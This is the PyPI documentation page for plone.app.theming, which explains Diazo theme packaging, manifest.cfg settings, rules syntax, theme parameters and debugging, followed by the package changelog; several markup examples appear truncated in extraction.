exactly one folder that contains all the theme files and the rules.xml file. (Do not compress the contents of the folder directly: when unpacked, the zip file should produce exactly one folder which in turn contains all the relevant files). In a Python package (programmers only) If you are creating a Python package containing Plone customisations that you intend to install into your site, you can let it register a theme for installation into the site. To do this, place a directory called e.g. theme at the top of the package, next to the Zope configure.zcml file, and add a <plone:static /> declaration to the configure.zcml file: <configure xmlns: ... <plone:static ... </configure> Notice the declaration of the plone namespace at the root <configure /> element. Place the theme files and the rules.xml file into the theme directory. If your package has a GenericSetup profile, you can automatically enable the theme upon installation of this profile by adding a theme.xml file in the profiles/default directory, containing e.g.: <theme> <name>mytheme</name> <enabled>true</enabled> </theme> The manifest file It is possible to give additional information about a theme by placing a file called manifest.cfg next to the rules.xml file at the top of a theme directory. This file may look like this: [theme] title = My theme description = A test theme rules = prefix = /some/prefix doctype = <!DOCTYPE html> preview = preview.png enabled-bundles = mybundle disabled-bundles = plone development-css = /++theme++barceloneta/less/barceloneta.plone.less production-css = /++theme++barceloneta/less/barceloneta-compiled.css development-js = /++theme++barceloneta/barceloneta.js production-js = /++theme++barceloneta/barceloneta.min.js tinymce-content-css = /++theme++barceloneta/tinymce-styles.css As shown here, the manifest file can be used to provide a more user friendly title and a longer description for the theme, for use in the control panel. Only the [theme] header is required - all other keys are optional. Manifest settings: - rules - to use a different rule file name than rules.xml (you should provide a URL or relative path). - prefix To change the absolute path prefix (see Advanced settings), use: prefix = /some/prefix - doctype To employ a DOCTYPE in the themed content other than XHTML 1.0 Transitional, add e.g.: doctype = <!DOCTYPE html> - preview To provide a user-friendly preview of your theme in the Theming control panel. Here, preview.png is an image file relative to the location of the manifest.cfg file: preview = preview.png - enabled-bundles - Bundles that will automatically be enabled when a theme is activated - disabled-bundles - Bundles that will automatically be disabled when a theme is activated - development-css - CSS to automatically include when in development mode and theme is active - development-js - JavaScript file to automatically include when in development mode when theme is active - production-css - CSS to automatically include when theme is active and in production mode - production-js - JavaScript to automatically include when theme is active and in production mode - tinymce-content-css - CSS file tinymce should load to apply styles to content inside the editor - tinymce-styles-css - CSS file tinymce should load to provide additionally automatically detected drop-down styles in the editor Extensions to the Diazo theming engine can add support for additional blocks of configurable parameters. Rules syntax The following is a short summary of the Diazo rules syntax. See for more details and further examples. Selectors Each rule is represented by an XML tag that operates on one or more HTML elements in the content and/or theme. The elements to operate on are indicated using attributes of the rules known as selectors. The easiest way to select elements is to use a CSS expression selector, such as css:content="#content" or css:theme="#main .content". Any valid CSS 3 expression (including pseudo-selectors like :first-child may be used. The standard selectors, css:theme and css:content, operate on the element(s) that are matched. If you want to operate on the children of the matched element instead, use css:theme-children="..." or css:content-children="..." instead. If you cannot construct a suitable CSS 3 expression, you can use XPath expressions such as content="/head/link" or theme="//div[@id='main']" (note the lack of a css: prefix when using XPath expressions). The two approaches are equivalent, and you can mix and match freely, but you cannot have e.g. both a css:theme and a theme attribute on a single rule. To operate on children of a node selected with an XPath expression, use theme-children="..." or content-children="...". You can learn more about XPath at. Conditions By default, every rule is executed, though rules that do not match any elements will of course do nothing. You can make a rule, set of rules or theme reference (see below) conditional upon an element appearing in the content by adding an attribute to the rule like css:if-content="#some-element" (to use an XPath expression instead, drop the css: prefix). If no elements match the expression, the rule is ignored. Tip: if a <replace /> rule matches an element in the theme but not in the content, the theme node will be dropped (replaced with nothing). If you do not want this behavior and you are unsure if the content will contain the relevant element(s), you can use css:if-content conditional rule. Since this is a common scenario, there is a shortcut: css:if-content="" means “use the expression from the css:content attribute”. Similarly, you can construct a condition based on the path of the current request by using an attribute like if-path="/news" (note that there is no css:if-path ). If the path starts with a slash, it will match from the root of the Plone site. If it ends with a slash, it will match to the end of the URL. You can set an absolute path by using a leading and a trailing slash. Finally, you can use arbitrary XPath expressions against any defined variable using an attribute like if="$host = 'localhost'" . By default, the variables url , scheme , host and base are available, representing the current URL. Themes may define additional variables in their manifests. Available rules The various rule types are summarized below. rules <rules> ... </rules> Wraps a set of rules. Must be used as the root element of the rules file. Nested <rules /> can be used with a condition to apply a single condition to a set of rules. When used as the root element of the rules file, the various XML namespaces must be declared: <rules xmlns="" xmlns: ... </rules> theme and notheme <theme href="theme.html" /> <theme href="news.html" if- <notheme if="$host = 'admin.example.org'" /> Choose the theme file to be used. The href is a path relative to the rules file. If multiple <theme /> elements are present, at most one may be given without a condition. The first theme with a condition that is true will be used, with the unconditional theme, if any, used as a fallback. <notheme /> can be used to specify a condition under which no theme should be used. <notheme /> takes precedence over <theme />. Tip: To ensure you do not accidentally style non-Plone pages, add a condition like css:if-content="#visual-portal-wrapper" to the last theme listed, and do not have any unconditional themes. replace <replace css: Replaces the matched element(s) in the theme with the matched element(s) from the content. before and after <before css: <after css: Inserts the matched element(s) from the content before or after the matched element(s) in the theme. By using theme-children , you can insert the matched content element(s) as the first (prepend) or last (append) element(s) inside the matched theme element(s). drop and strip <drop css: <drop theme="/head/link" /> <drop css: <strip css: Remove element(s) from the theme or content. Note that unlike most other rules, a <drop /> or <strip /> rule can operate on the theme or content , but not both. <drop /> removes the matched element(s) and any children, whereas <strip /> removes the matched element(s), but leaves any children in place. <drop /> may be given a whitespace-separated list of attributes to drop. In this case, the matched element(s) themselves will not be removed. Use attributes="*" to drop all attributes. merge and copy <merge attributes="class" css: <copy attributes="class" css: These rules operate on attributes. <merge /> will add the contents of the named attribute(s) in the theme to the value(s) of any existing attributes with the same name(s) in the content, separated by whitespace. It is mainly used to merge CSS classes. <copy /> will copy attributes from the matched element(s) in the content to the matched element(s) in the theme, fully replacing any attributes with the same name that may already be in the theme. The attributes attribute can contain a whitespace-separated list of attributes, or the special value * to operate on all attributes of the matched element. Advanced modification Instead of selecting markup to insert into the theme from the content, you can place markup directly into the rules file, as child nodes of the relevant rule element: <after css: <style type="text/css"> body > h1 { color: red; } </style> </after> This also works on the content, allowing you to modify it on the fly before any rules are applied: <replace css: <button type="submit"> <img src="images/search.png" alt="Search" /> </button> </replace> In addition to including static HTML in this manner, you can use XSLT instructions that operate on the content. You can even use css: selectors directly in the XSLT.: <replace css: <dl id="details"> <xsl:for-each css: <dt><xsl:copy-of</dt> <dd><xsl:copy-of</dd> </xsl:for-each> </dl> </replace>" /> Theme parameters It is possible to pass arbitrary parameters to your theme, which can be referenced as variables in XPath expressions. Parameters can be set in Plone’s theming control panel, and may be imported from a manifest.cfg file. For example, you could have a parameter mode that could be set to the string live or test. In your rules, you could do something like this to insert a warning when you are on the test server: <before css: <span class="warning">Warning: This is the test server</span> </before> You could even use the parameter value directly, e.g.: <before css: <span class="info">This is the <xsl:value-of server</span> </before> The following parameters are always available to Plone themes: - scheme - The scheme portion of the inbound URL, usually http or https. - host - The hostname in the inbound URL. - path - The path segment of the inbound URL. This will not include any virtual hosting tokens, i.e. it is the path the end user sees. - base - The Zope base url (the BASE1 request variable). You can add additional parameters through the control panel, using TALES expressions. Parameters are listed on the Advanced tab, one per line, in the form <name> = <expression>. For example, if you want to avoid theming any pages that are loaded by Plone’s overlays, you can make use of the ajax_load request parameter that they set. Your rules file might include: <notheme if="$ajax_load" /> To add this parameter as well as the mode parameter outlined earlier, you could add the following in the control panel: ajax_load = python: request.form.get('ajax_load') mode = string: test The right hand side is a TALES expression. It must evaluate to a string, integer, float, boolean or None: lists, dicts and objects are not supported. python:, string: and path expressions work as they do in Zope Page Templates. The following variables are available when constructing these TALES expressions: - context - The context of the current request, usually a content object. - request - The current request. - portal - The portal root object. - context_state - The @@plone_context_state view, from which you can look up additional values such as the context’s URL or default view. - portal_state - The @@plone_portal_state view, form which you can look up additional values such as the navigation root URL or whether or not the current user is logged in. See plone.app.layout for details about the @@plone_context_state and @@plone_portal_state views. Theme parameters are usually integral to a theme, and will therefore be set based on a theme’s manifest when a theme is imported or enabled. This is done using the [theme:parameters] section in the manifest.cfg file. For example: [theme] title = My theme description = A test theme [theme:parameters] ajax_load = python: request.form.get('ajax_load') mode = string: test Theme debugging When Zope is in development mode (e.g. running in the foreground in a console with bin/instance fg), the theme will be re-compiled on each request. In non-development mode, it is compiled once when first accessed, and then only re- compiled the control panel values are changed. Also, in development mode, it is possible to temporarily disable the theme by appending a query string parameter diazo.off=1. For example: Finally, you can get an overlay containing your rules, annotated with how many times the conditions matched both the theme and the document. Green means the condition matched, red means it didn’t. The entire rule tag will be green (i.e. it had an effect) so long as all conditions within are green. To enable this, append diazo.debug=1. For example: The parameter is ignored in non-development mode. Commonly used rules The following recipes illustrate rules commonly used in building Plone themes: To copy the page title: <replace css: To copy the <base /> tag (necessary for Plone’s links to work): <replace css: If there is no <base /> tag in the theme, you can do: <before css:theme-children=”head” css:content= --> <after theme- To copy Plone’s JavaScript resources: <!-- Pull in Plone CSS --> <after theme- To copy the class of the <body /> tag (necessary for certain Plone JavaScript functions and styles to work properly): <!-- Body --> <merge attributes="class" css: Advanced:: - Register your theme’s styles with Plone’s portal_css tool (this is normally best done when you ship a theme in a Python package - there is currently no way to automate this for a theme imported from a Zip file or created through the web) - Drop the theme’s styles with a rule, and then - Include all styles from Plone For example, you could add the following rules: <drop theme="/html/head/link" /> <drop theme="/html/head/style" /> <!-- Pull in Plone CSS --> <after theme- The use of an “or” expression for the content in the after /> rule means that the relative ordering of link and style elements is maintained. To register stylesheets upon product installation using GenericSetup, use the cssregistry.xml import step in your GenericSetup profiles/default directory: <?xml version="1.0"?> <object name="portal_css"> <!-- Set conditions on stylesheets we don't want to pull in --> <stylesheet expression="not:request/HTTP_X_THEME_ENABLED | nothing" id="public.css" /> <!-- Add new stylesheets --> <stylesheet title="" authenticated="False" cacheable="True" compression="safe" conditionalcomment="" cookable="True" enabled="on" expression="request/HTTP_X_THEME_ENABLED | nothing" id="++theme++my.theme/css/styles.css" media="" rel="stylesheet" rendering="link" applyPrefix="True" /> </object> There is one important caveat, however. Your stylesheet may include relative URL references of the following form: background-image: url(../images/bg.jpg); If your stylesheet lives in a resource directory (e.g. it is registered in portal_css with the id ++theme++my.theme/css/styles.css), this will work fine so long as the registry (and Zope) is in debug mode. The relative URL will be resolved by the browser to ++theme++my.theme must set the applyPrefix flag to true when installing your CSS resource using cssregistry.xml. There is a corresponding flag in the portal_css user interface. It is sometimes useful to show some of Plone’s CSS in the styled site. You can achieve this by using an Diazo <after /> Diazo is not used. To make this easier, you can use the following expressions as conditions in the portal_css tool (and portal_javascripts if relevant), in portal_actions, in page templates, and other places that use TAL expression syntax: request/HTTP_X_THEME_ENABLED | nothing This expression will return True if Diazo is currently enabled, in which case an HTTP header “X-Theme-Enabled” will be set. If you later deploy the theme to a fronting web server such as nginx, you can set the same request header there to get the same effect, even if plone.app.theming is uninstalled. Use: not: request/HTTP_X_THEME_ENABLED | nothing to ‘hide’ a style sheet from the themed site. Changelog ========= 1.2.7 (2015-07-18) - Provide better styling to themeing control panel, less build, finish implementation [obct537] - make sure when copying themes that you try to modify the base urls to match the new theme are all the manifest.cfg settings [vangheem] - implement switchable theming policy API, re-implement theme caching [gyst] - fixed configuration of copied theme [vmaksymiv] - implemented upload for theme manager [schwartz] - Change the category of the configlet to ‘plone-general’. [sneridagh] 1.2.6 (2015-06-05) - removed irrelevant theme renaming code [schwartz] - Filesystem themes are now correctly overridden. TTW themes can no longer be overriden [schwartz] - re-added manifest check [schwartz] - Fixed broken getTheme method [schwartz] - Minor ReStructuredText fixes for documentation. [maurits] 1.2.5 (2015-05-13) - Fix RestructuredText representation on PyPI by bringing back a few example lines in the manifest. [maurits] 1.2.4 (2015-05-12) - Add setting for tinymce automatically detected styles [vangheem] 1.2.3 (2015-05-04) - fix AttributeError: ‘NoneType’ object has no attribute ‘getroottree’ when the result is not html / is empty. [sunew] - make control panel usable again. Fixed problem where skins control panel is no longer present. [vangheem] - unified different getTheme functions. [jensens] - pep8ified, housekeeping, cleanup [jensens] - Specify i18n:domain in controlpanel.pt. [vincentfretin] - pat-modal pattern has been renamed to pat-plone-modal [jcbrand] - Fix load pluginSettings for the enabled theme before calling plugins for onEnabled and call onEnabled plugins with correct parameters [datakurre] 1.2.2 (2015-03-22) - Patch the ZMI only for available ZMI pages. [thet] - Change deprecated import of zope.site.hooks.getSite to zope.component.hooks.getSite. [thet] - Add an error log if the subrequest failed (probably a relative xi:include) instead of silently returning None (and so having a xi:include returning nothing). [vincentfretin] - Fix transform to not affect the result when theming is disabled [datakurre] - Integrate thememapper mockup pattern and fix theming control panel to be more usable [ebrehault] 1.2.1 (2014-10-23) - Remove DL’s from portal message in templates. [khink] - Fix “Insufficient Privileges” for “Site Administrators” on the control panel. [@rpatterson] - Add IThemeAppliedEvent [vangheem] - Put themes in a separate zcml file to be able to exclude them [laulaz] - #14107 bot requests like /widget/oauth_login/info.txt causes problems finding correct context with plone.app.theming [anthonygerrard] - Added support for ++theme++ to traverse to the contents of the current activated theme. [bosim] 1.2.0 (2014-03-02) - Disable theming for manage_shutdown view. [davisagli] - Fix reference to theme error template [afrepues] - Add “Test Styles” button in control panel to expose, test_rendering template. [runyaga] 1.1.1 (2013-05-23) - Fixed i18n issues. [thomasdesvenain] - Fixed i18n issues. [jianaijun] - This fixed UnicodeDecodeError when Theme Title is Non-ASCII in the manifest.cfg file. [jianaijun] 1.1 (2013-04-06) - Fixed i18n issues. [vincentfretin] - Make the template theme do what it claims to do: copy styles as well as scripts. [smcmahon] - Change the label and description for the example theme to supply useful information. [smcmahon] - Upgrades from 1.0 get the combined “Theming” control panel that was added in 1.1a1. [danjacka] 1.1b2 (2013-01-01) 1.1b1 (2012-10-16) - Add diazo.debug option, route all error_log output through this so debugging can be displayed [lentinj] - Make example Bootstrap-based theme use the HTML5 DOCTYPE. [danjacka] - Demote ZMI patch log message to debug level. [hannosch] - Upgrade to ACE 1.0 via plone.resourceeditor [optilude] - Put quotes around jQuery attribute selector values to appease jQuery 1.7.2. [danjacka] 1.1a2 (2012-08-30) - Protect the control panel with a specific permission so it can be delegated. [davisagli] - Advise defining ajax_load as request.form.get('ajax_load') in manifest.cfg. For instance, the login_form has an hidden empty ajax_load input, which would give an unthemed page after submitting the form. [maurits] - Change theme editor page templates to use main_template rather than prefs_main_template to avoid inserting CSS and JavaScript too early under plonetheme.classic. [danjacka] 1.1a1 (2012-08-08) - Replace the stock “Themes” control panel with a renamed “Theming” control panel, which incorporates the former’s settings under its “Advanced” tab. [optilude] - Add a full in-Plone theme authoring environment [optilude, vangheem] - Update IBeforeTraverseEvent import to zope.traversing. [hannosch] - On tab “Manage themes”, change table header to better describe what’s actually listed. [kleist] 1.0 (2012-04-15) - Prevent AttributeError when getRequest returns None. [maurits] - Calculate subrequests against navigation root rather than portal. [elro] - Supply closest context found for 404 pages. [elro] - Lookup portal state with correct context. [elro] 1.0b9 - 2011-11-02 - Patch App.Management.Navigation to disable theming of ZMI pages. [elro] 1.0b8 - 2011-07-04 - Evaluate theme parameters regardless of whether there is a valid context or not (e.g. when templating a 404 page). [lentinj] 1.0b7 - 2011-06-12 - Moved the views and overrides plugins out into a separate package plone.app.themingplugins. If you want to use those features, you need to install that package in your buildout. Themes attempting to register views or overrides in environments where plone.app.themingplugins is not installed will install, but views and overrides will not take effect. [optilude] 1.0b6 - 2011-06-08 - Support for setting arbitrary Doctypes. [elro] - Upgrade step to update plone.app.registry configuration. [elro] - Fixed plugin initialization when applying a theme. [maurits] - Query the resource directory using the ‘currentTheme’ name instead of the Theme object (updating the control panel was broken). [maurits] - Fix zip import (plugin initialization was broken.) [elro] 1.0b5 - 2011-05-29 - Make sure the control panel is never themed, by setting the X-Theme-Disabled response header. [optilude] - Add support for registering new views from Zope Page Templates and overriding existing templates. See README for more details. [optilude] 1.0b4 - 2011-05-24 - Add support for X-Theme-Disabled response header. [elro] - Make “Replace existing theme” checkbox default to off. [elro] - Fix control panel to correctly display a newly uploaded theme. [elro] - Fix zip import to work correctly when no manifest is supplied. [elro] 1.0b3 - 2011-05-23 - Show theme name along with title in control panel. [elro] 1.0b2 - 2011-05-16 - Encode internally resolved documents to support non-ascii characters correctly. [elro] - Fix control panel to use theme name not id. [optilude] 1.0b1 - 2011-04-22 - Wrap internal subrequests for css or js in style or script tags to facilitate inline includes. [elro] - Add theme.xml import step (see README). [optilude] - Add support for [theme:parameters] section in manifest.cfg, which can be used to set parameters and the corresponding TALES expressions to calculate them. [optilude] - Add support for parameter expressions based on TALES expressions [optilude] - Use plone.subrequest 1.6 features to work with IStreamIterator from plone.resource. [elro] - Depend on Products.CMFPlone instead of Plone. [elro] - Added support for uploading themes as Zip archives. [optilude] - Added theme off switch: Add a query string parameter diazo.off=1 to a request whilst Zope is in development mode to turn off the theme. [optilude] - Removed ‘theme’ and alternative themes support: Themes should be referenced using the <theme /> directive in the Diazo rules file. [optilude] - Removed ‘domains’ support: This can be handled with the rules file syntax by using the host parameter. [optilude] - Removed ‘notheme’ support: This can be handled within the rules file syntax by using the path parameter. [optilude] - Added path and host as parameters to the Diazo rules file. These can now be used as conditional expressions. [optilude] - Removed dependency on XDV in favour of dependency on Diazo (which is the new name for XDV). [optilude] - Forked from collective.xdv 1.0rc11. [optilude] - Downloads (All Versions): - 244 downloads in the last day - 1590 downloads in the last week - 5784 downloads in the last month - Author: Martin Aspeli and Laurence Rowe - Keywords: plone diazo xdv deliverance theme transform xslt - License: GPL - Categories - Package Index Owner: optilude, laurencerowe, esteele, davisagli, vangheem, timo, plone - DOAP record: plone.app.theming-1.2.7.xml
https://pypi.python.org/pypi/plone.app.theming/
CC-MAIN-2015-32
refinedweb
7,215
64.41
#include <CGAL/Hilbert_sort_on_sphere_3.h> The function object Hilbert_sort_on_sphere_3 sorts iterator ranges of Traits::Point_3 along a Hilbert curve on a given sphere. Actually, it approximates a Hilbert curve on that sphere by a Hilbert curve on a certain cube. For each face of that cube, it calls an appropriate version of Hilbert_sort_2 which sorts a subset of the iterator range. Hilbert_sort_2 in each face is called with the median or the middle policy depending on the PolicyTag. The input points are supposed to be close to the input sphere. If input points are not close to the input sphere, this function still works, but it might not be a good sorting function. constructs an instance with traits as traits class instance, sq_r as the squared_radius of the given sphere, and p as the center of the given sphere. It sorts the range [begin, end) along a hilbert curve on the sphere centered at p with squared radius sq_r; these arguments are passed in the construction of the object Hilbert_sort_on_sphere_3.
https://doc.cgal.org/latest/Spatial_sorting/classCGAL_1_1Hilbert__sort__on__sphere__3.html
CC-MAIN-2021-49
refinedweb
169
67.28
NAME¶isympy - interactive shell for SymPy SYNOPSIS¶ isympy [-c | --console] [-p ENCODING | --pretty ENCODING] [-t TYPE | --types TYPE] [-o ORDER | --order ORDER] [-q | --quiet] [-d | --doctest] [-C | --no-cache] [-a | --auto] [-D | --debug] [ -- | PYTHONOPTIONS] isympy [ {-h | --help} | {-v | --version} ] DESCRIPTION¶isympy is a Python shell for SymPy. It is just a normal python shell (ipython shell if you have the ipython package installed) that executes the following commands so that you don't have to: >>> from __future__ import division >>> from sympy import * >>> x, y, z = symbols("x,y,z") >>> k, m, n = symbols("k,m,n",¶ - -c SHELL, --console=SHELL - Use the specified shell (python or ipython) as console backend instead of the default one (ipython if present or python otherwise). Example: isympy -c python SHELL could be either 'ipython' or 'python' - -p ENCODING, --pretty=ENCODING - Setup pretty printing in SymPy. By default, the most pretty, unicode printing is enabled (if the terminal supports it). You can use less pretty ASCII printing instead or no pretty printing at all. Example: isympy -p no ENCODING must be one of 'unicode', 'ascii' or 'no'. - -t TYPE, --types=TYPE - Setup the ground types for the polys. By default, gmpy ground types are used if gmpy2 or gmpy is installed, otherwise it falls back to python ground types, which are a little bit slower. You can manually choose python ground types even if gmpy is installed (e.g., for testing purposes). Note that sympy ground types are not supported, and should be used only for experimental purposes. Note that the gmpy1 ground type is primarily intended for testing; it the use of gmpy even if gmpy2 is available. This is the same as setting the environment variable SYMPY_GROUND_TYPES to the given ground type (e.g., SYMPY_GROUND_TYPES='gmpy') The ground types can be determined interactively from the variable sympy.polys.domains.GROUND_TYPES inside the isympy shell itself. Example: isympy -t python TYPE must be one of 'gmpy', 'gmpy1' or 'python'. - -o ORDER, --order=ORDER - Setup the ordering of terms for printing. The default is lex, which orders terms lexicographically (e.g., x**2 + x + 1). You can choose other orderings, such as rev-lex, which will use reverse lexicographic ordering (e.g., 1 + x + x**2). Note that for very large expressions, ORDER='none' may speed up printing considerably, with the tradeoff that the order of the terms in the printed expression will have no canonical order Example: isympy -o rev-lax ORDER must be one of 'lex', 'rev-lex', 'grlex', 'rev-grlex', 'grevlex', 'rev-grevlex', 'old', or 'none'. - -q, --quiet - Print only Python's and SymPy's versions to stdout at startup, and nothing else. - -d, --doctest - Use the same format that should be used for doctests. This is equivalent to 'isympy -c python -p no'. - -C, --no-cache - Disable the caching mechanism. Disabling the cache may slow certain operations down considerably. This is useful for testing the cache, or for benchmarking, as the cache can result in deceptive benchmark timings. This is the same as setting the environment variable SYMPY_USE_CACHE to 'no'. - -a, --auto - Automatically create missing symbols. Normally, typing a name of a Symbol that has not been instantiated first would raise NameError, but with this option enabled, any undefined name will be automatically created as a Symbol. This only works in IPython 0.11. Note that this is intended only for interactive, calculator style usage. In a script that uses SymPy, Symbols should be instantiated at the top, so that it's clear what they are. This will not override any names that are already defined, which includes the single character letters represented by the mnemonic QCOSINE (see the "Gotchas and Pitfalls" document in the documentation). You can delete existing names by executing "del name" in the shell itself. You can see if a name is defined by typing "'name' in globals()". The Symbols that are created using this have default assumptions. If you want to place assumptions on symbols, you should create them using symbols() or var(). Finally, this only works in the top level namespace. So, for example, if you define a function in isympy with an undefined Symbol, it will not work. - -D, --debug - Enable debugging output. This is the same as setting the environment variable SYMPY_DEBUG to 'True'. The debug status is set in the variable SYMPY_DEBUG within isympy. - -- PYTHONOPTIONS - These options will be passed on to ipython (1) shell. Only supported when ipython is being used (standard python shell not supported). Two dashes (--) are required to separate PYTHONOPTIONS from the other isympy options. For example, to run iSymPy without startup banner and colors: isympy -q -c ipython -- --colors=NoColor - -h, --help - Print help output and exit. - -v, --version - Print isympy version information and exit. FILES¶ - ${HOME}/.sympy-history - Saves the history of commands when using the python shell as backend.
https://manpages.debian.org/buster/isympy-common/isympy.1.en.html
CC-MAIN-2021-31
refinedweb
804
64.41
In Serbia, there are still many regions with very little OSM data. In 2012, the Slovenian OSM community obtained USGS map data in Public Domain and put it on WMS servers for mapping purposes. Some users in the Serbian OSM community disapprove of its usage though, citing that it is better not to have maps than maps that were not checked with GPS and highway classificiations that were not reviewed on the ground, as users might get into trouble following these not fully reliable roads and paths. Generally, IMO it is better to have a not 100% reliable map than no map at all; my solution would be to reliably mark the source of the entered ways and nodes as "USGS maps" and thus to leave them as they are until they are revised with GPS nodes from local mappers. Would you agree? asked 16 Sep '15, 10:32 cirko 106●2●3●8 accept rate: 0% edited 16 Sep '15, 18:54 aseerel4c26 ♦ 32.2k●16●239●552 In my opinion it all depends on the quality of the data. If the roads have an offset of a few meters or don't reflect the changes from the past year then this is acceptable for the start I would say. However if the classification is plain wrong (i.e. highway=residential instead of highway=track) or not present at all or if the data is several years old or the offset very large or the data contains road that aren't present at all then by all means throw it away and go surveying yourself. Of course it takes some time and effort to review the data and get an idea about it's quality. And more importantly: You should discuss import plans with the local community, help.openstreetmap.org is the wrong place. answered 16 Sep '15, 13:10 scai ♦ 31.9k●20●291●442 accept rate: 23% edited 16 Sep '15, 13:38 Well I'm not discussing peculiar import plans here, though bringing up an example, but posing a question that could be of general relevance for mappers. The discussion you're advising has already been led, this is just an effort to see what the opinions are in the general community. The answer might prove to be useful for subsequent newbies. But yes, "it depends" will as always be the answer to go with (like in the first answer), and where to draw the line will always remain the point of discussion, and the discussion should always primarily be led by those most affected by it, true. "Would you agree?" No. It is not that we don't have experience with importing junk, we actually have too much experience with it. Simply filling the map with evertyhing you can lay hands on makes it difficult to find out what is correct, what not, if further work is necessary and so on... besides the issue you mentioned of including unreviewed data from a quality pov. And in general correcting mistakes is more work than doing it right first time. Now the maps in question may or may not be of suitable quality and if available on compatible licence terms may might make complete sense as a refeference and mapping support. It should however be noted that statements by US Military organisations on the copyright status of their material should be viewed critically, very often the original source material has been obtained in military conflict and may still be protected in the country of origin. answered 16 Sep '15, 12:13 SimonPoole ♦ 40.0k●13●295●634 accept rate: 19% edited 16 Sep '15, 12:15 Your pov is clear and stands for quality, and let's leave aside the question whether this particular example is licensed adequately or not, but how can someone know when he sees a "blank map" whether there will ever be a mapper having more knowledge than him about this certain piece of land? See armchair mapping: I am perfectly aware that entering imperfect maps means more work than doing it well from scratch, but how can you know whethere there 'is' anybody who can and will do it from scratch? Isn't the point of OSM "contribute now on the maximum available level with all you have"? I am absolutely not talking about mapping areas where "real" OSM editing based on on-the-ground knowledge clearly is already happening. I don't believe we have a principle of "contribute now on the maximum available level with all you have", if at all it might be "contribute what interests you" (within reason), and as a corollary if nobody is interested well then the map is blank. Now naturally the whole issue is not black or white. IMHO having the major roads (motorways, perhaps down to secondary level or equivalent) in OSM is so useful that arm chairing those at quite large distances is quite OK, however with increasing detail the nearer you should be and the more important actual on the ground surveying becomes. I'm not even touching on the community building aspect of actually having room to add simple things here. Well, "it depends" is an answer that is in almost 100% of cases correct, and so it is here. :) Of course everyone should just do what interests him, OSM is voluntary, but when you're saying "within reason", that's the point where opinions of different people as always diverge. Me personally, I'm having trouble looking at blank maps from regions I know but cannot travel to right now, and looking at these very nice 1:50000 PD maps I took a shot at mapping rivers and roads down to unclassifieds in one particular region I originate from, unfortunately at almost the same time a more professional local user started mapping and thus we got tangled up a bit. Not mapping there anymore, of course, but I still just wanted to know what the opinions are on the topic, though it's clear that there will never be one solution for all. @cirko: this is a Q&A site not the place for long discussions from your POV. I'm sorry if you got me wrong, never meant to go into discussions about my peculiar example. The comments just reflect that the line between black and white is hard to draw. We're not talking about just importing junk here I think, but about using an extra data source on top of aerial imagery and public gps tracks. I don't see the harm in that. @joost the question was far more general than just the specific example, thats why he got an answer to both. Go for it, copy as much as you can from maps that are out of copyright (OOC) or where the licence is compatible We make great use of old maps for various features in Ireland, see here Very shortly we'll be making use of maps from the very same source for #MapLesotho About the only caveat would be to not use them for classifying roads answered 16 Sep '15, 22:28 DaCor 1.3k●1●10●29 accept rate: 2% edited 17 Sep '15, 17:48 The OP was not referring to "old maps" in his example, but to a map from a source that is known to not respect non-US IPR. Sorry, said old in reference thinking of the maps we use in Ireland. Edited to clarify what I should have said While it makes sense in some cases, I certainly wouldn't "copy as much as you can from maps that are out of copyright (OOC)". In the case of features that haven't changed (much) since the last century, such as Irish townlands, it does make sense. However in many cases there are problems. One is that the accuracy of old maps often isn't very good. In GB we we've had a few people drawing old railway lines and footpaths from OS "New Popular Edition" and other OOC sources. Near where I live the former path of railways is often visible, and the equivalent features on the local NPE map are sometimes only within 50m or so (different features have different offsets so I suspect some were added laterm perhaps by someone on a Friday before they finished work for the weekend). Another problem is that some things just don't exist in the same form any more. Railways are an obvious example again here, but another one is footpaths. As an example, at the time of writing, there are a few at (I was there yesterday). The footpaths that mappers have copied from NPE sometimes (but not always) correspond to a current footpath, but often not very closely. In the specific case of the footpaths that I surveyed yesterday, it was more difficult to do so with invalid OOC data present than it would have been without it. In that particular case, "not mapping" would have been better than copying something that's old and invalid, but as has been said already "it depends". Once you sign in you will be able to subscribe for any updates here Answers Answers and Comments Markdown Basics learn more about Markdown This is the support site for OpenStreetMap. Question tags: import ×178 mapping ×161 usgs ×7 serbia ×4 question asked: 16 Sep '15, 10:32 question was seen: 2,528 times last updated: 21 Sep '15, 14:12 USGS copyright What is a Mapping Party? Uploading a GPX from TTGpsLogger doesn't work How do I import map data from a .dwg file to OpenStreetMap? How can I map an area described by metes and bounds? How should I go about importing a city? Uploading a small bit of new TIGER data (and 3 other unrelated questions) What are the most common mapping mistakes that other users make? Tagging "seasonal use roads" (questions: road type, blockout months, 4x4) Can a way contain the same node more than just at the beginning and end? First time here? Check out the FAQ!
https://help.openstreetmap.org/questions/45271/is-not-mapping-better-than-copying-from-public-domain
CC-MAIN-2020-24
refinedweb
1,683
64.64
Advertise with Us! We have a variety of advertising options which would give your courses an instant visibility to a very large set of developers, designers and data scientists.View Plans Python Programming Language - A Gentle Introduction Table of Contents. Why Learn) - Python framework has modules and packages, hence facilitates code reusability. - Python is open source or freely distributed. You can download it for free and use it in your application. You can also read and modify the source code. - No Compilation of the code – The cycle of Edit-test-debug is fast hence a delight to any coder. - Supports exception handling. Any code is prone to errors. Python generates exceptions which can be handled hence avoids crashing of programs. - Automatic memory management. Memory management in Python involves a private heap(a data structure that represents a queue) containing all Python objects and data structures. On demand, the Python memory manager allocates the heap space for Python objects and other internal buffers. The management of this private heap is ensured internally by the Python memory manager. You can do a lot with Python. Here is a list of applications in the modern world:. Application giants like Youtube, Spotify, Mozilla, DropBox, Instagram use the Django framework. Whereas Airbnb, Netflix, Uber, Samsung use the Flask framework.. Data Analysis Python has tools for almost every aspect of scientific computing. Bank of America uses Python to crunch their financial data and Facebook looks upon the Python library Pandas for its data analysis. While there are many libraries available to perform data analysis in Python, here are a few to get you started: - NumPy For scientific computing with Python, NumPy is fundamental. It supports large, multi-dimensional arrays and matrices and includes an assortment of high-level mathematical functions to operate on these arrays. - SciPy works with NumPy arrays and provides efficient routines for numerical integration and optimization. - Pandas, is also built on top of NumPy, offers data structures and operations for manipulating numerical tables and time series. - Matplotlib is a 2D plotting library that can generate data visualizations as histograms, power spectra, bar charts, and scatterplots with just a few lines of code. Games Python and Pygame are good languages and framework for rapid game prototyping or for beginners learning how to make simple games. The famous Disney's multiplayer online role-playing game Toontown Online is written in Python and uses Panda3D for graphics. Battlefield 2 a first-person shooter military simulator video game uses Python for all of its add-ons and a lot of its functionality. Frets on Fire a free, open-source Finnish music video game is written in Python and uses Pygame. Pygame is a Free and Open Source python programming language library for making multimedia applications like games. Desktop Applications As a part of Python standard library - Tkinter gives you a possibility to create small, simple GUI applications. The PyQt library is most useful for desktop 